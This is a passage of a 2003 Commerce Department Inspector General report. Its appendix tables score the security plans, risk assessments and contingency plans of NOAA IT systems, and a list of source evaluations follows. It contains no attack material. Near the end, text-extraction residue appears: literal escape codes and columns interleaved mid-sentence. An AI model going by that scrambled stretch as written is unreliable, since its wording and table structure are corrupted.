Number of systems certified and accredited with residual risks identified | 0 | Interim accreditation letters state that residual risks were considered, but none were identified. Vulnerability scans were conducted after interim accreditation was granted.
Number of risk assessments that provide a sufficient basis for identifying security controls | 0 | No risk assessments were provided.
Number of security plans that adequately: | |
--Describe applications/data/data flow | 0 |
--Identify interconnections | 0 |
--Provide support for assigned sensitivity levels | 0 |
Number of contingency plans that adequately: | |
--Identify alternate sites | 0 |
--Describe backup procedures | 3 |
--Describe system restoration procedures | 0 |
Table A-6: NOAA-National Environmental Satellite, Data, and Information Service

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 3 | Two of the systems were evaluated as part of our FY 03 in-depth FISMA reviews.
Number of systems certified and accredited | 3 |
Number of systems certified and accredited with adequate testing | 0 |
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 0 | Risk assessments were hazard matrices, which do not provide a sufficient basis for determining controls.
Number of security plans that adequately: | |
--Describe applications/data/data flow | 0 |
--Identify interconnections | 0 |
--Provide support for assigned sensitivity levels | 1 |
Number of contingency plans that adequately: | |
--Identify alternate sites | 1 |
--Describe backup procedures | 3 |
--Describe system restoration procedures | 0 |
Table A-7: NOAA-National Marine Fisheries Service

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 2 | Both systems were evaluated as part of our FY 03 in-depth FISMA reviews.
Number of systems certified and accredited | 2 |
Number of systems certified and accredited with adequate testing | 0 |
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 2 | Risk assessments did not use NOAA's standard hazard matrices and were more complete.
Number of security plans that adequately: | |
--Describe applications/data/data flow | 0 |
--Identify interconnections | 0 |
--Provide support for assigned sensitivity levels | 0 |
Number of contingency plans that adequately: | |
--Identify alternate sites | 1 |
--Describe backup procedures | 2 |
--Describe system restoration procedures | 0 |
Table A-8: NOAA-National Ocean Service

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 3 |
Number of systems certified and accredited | 3 |
Number of systems certified and accredited with adequate testing | 0 | Vulnerability scans performed on 2 systems; password strength tested on 1 system.
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 0 | Risk assessments were hazard matrices, which do not provide a sufficient basis for determining controls.
Number of security plans that adequately: | |
--Describe applications/data/data flow | 1 |
--Identify interconnections | 3 | The list of interconnections in one plan may not be complete, because some that are cited elsewhere in the plan are not on the list.
--Provide support for assigned sensitivity levels | 1 | Confidentiality not well supported in 2 plans, and both had conflicting confidentiality levels.
Number of contingency plans that adequately: | |
--Identify alternate sites | 0 | Contingency plans address the need to establish alternate sites, but do not identify the sites.
--Describe backup procedures | 3 |
--Describe system restoration procedures | 0 |

Table A-9: NOAA-National Weather Service

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 7 |
Number of systems certified and accredited | 7 |
Number of systems certified and accredited with adequate testing | 0 |
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 0 | Risk assessments were hazard matrices, which do not provide a sufficient basis for determining controls.
Number of security plans that adequately: | |
--Describe applications/data/data flow | 1 |
--Identify interconnections | 1 |
--Provide support for assigned sensitivity levels | 0 | One system's confidentiality level was based on an inaccurate description of the data, while the remaining systems did not support assigned sensitivity levels.
Number of contingency plans that adequately: | |
--Identify alternate sites | 7* |
--Describe backup procedures | 3 |
--Describe system restoration procedures | 0 |

*Three systems are covered in contingency plans for site certifications and accreditations.

Table A-10: NOAA-Office of Atmospheric Research

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 4 |
Number of systems certified and accredited | 4 |
Number of systems certified and accredited with adequate testing | 0 | OAR stated that these systems do not require testing beyond NIST self-assessment; however, based on their sensitivity, we believe thorough testing is required.
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 4 | OAR augmented NOAA's standard hazard matrices with more complete risk assessments.
Number of security plans that adequately: | |
--Describe applications/data/data flow | 0 |
--Identify interconnections | 1 |
--Provide support for assigned sensitivity levels | 1 | One system indicated that it carries Privacy Act, financial, and credit card information; however, the system is a meteorological system used to obtain scientific atmospheric information.
This\n  sensitivity levels\n                                              inaccuracy appears to have resulted from sections being cut and\n                                              pasted from another plan without sufficient revision.\n                                              One plan (for a different system than that cited above) had\n Number of contingency plans that\n                                              sections cut and pasted from another plan without sufficient\n adequately:\n                                              revision (e.g., the wrong system is cited in places).\n --Identify alternate sites               1\n --Describe backup procedures             4\n --Describe system restoration\n                                          0\n  procedures\n\n\n\n\n                                                 A-11 \n\n\x0cU.S. Department of Commerce                                      Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                         September 2003\n\n\n\n\n\n                      Appendix B. OIG Evaluations Used In This Report\n\n1. \t   National Oceanic and Atmospheric Administration, Stronger Security Controls Needed to\n       Protect NMFS Information Technology Systems, Inspection Report No. OSE-15693,\n       September 2003.\n\n2. \t   National Oceanic and Atmospheric Administration, Stronger Security Controls Needed to\n       Protect NESDIS\xe2\x80\x99 Headquarters Local Area Network, Inspection Report No. OSE-15996\n       3-0001, September 2003.\n\n3. \t   National Oceanic and Atmospheric Administration, Stronger Security Controls Needed to\n       Protect NESDIS Research Data System, Inspection Report No. OSE-15996-3-0002,\n       September 2003.\n\n4. \t   Office of the Secretary, Review of IT Controls to Support the FY 2002 Consolidated\n       Financial Statement Audit, Audit Report No. FSD-15214-3-0001, January 2003.\n\n5. 
\t   National Technical Information Service, Improvements Needed in the General Controls\n       Associated with NTIS\xe2\x80\x99s Financial Management Systems, Audit Report No. FSD-15212,\n       December 2002.\n\n6. \t   United States Patent and Trademark Office, Improvements Needed in the General\n       Controls Associated with USPTO\xe2\x80\x99s Financial Management Systems, Audit Report No.\n       FSD-15213, December 2002.\n\n\n\n\n                                            B-1 \n\n\x0c"